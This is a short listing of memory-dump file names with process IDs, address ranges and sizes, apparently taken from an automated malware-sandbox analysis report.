memory/2360-15-0x00000000075C0000-0x00000000075C1000-memory.dmp  Filesize: 4KB
memory/2360-14-0x0000000007470000-0x0000000007471000-memory.dmp  Filesize: 4KB
memory/2360-13-0x0000000007550000-0x0000000007551000-memory.dmp  Filesize: 4KB
memory/2368-24-0x0000000000000000-mapping.dmp
memory/2380-59-0x0000000000000000-mapping.dmp
memory/2508-65-0x0000000000000000-mapping.dmp
memory/2544-63-0x0000000000000000-mapping.dmp
memory/3012-23-0x0000000000000000-mapping.dmp
memory/3588-61-0x0000000000000000-mapping.dmp
memory/3960-30-0x0000000000000000-mapping.dmp
memory/3960-35-0x0000000000400000-0x000000000043D000-memory.dmp  Filesize: 244KB
memory/3960-34-0x00000000005A0000-0x00000000005DC000-memory.dmp  Filesize: 240KB
memory/3960-33-0x0000000000400000-0x000000000043D000-memory.dmp  Filesize: 244KB
memory/4024-29-0x0000000000000000-mapping.dmp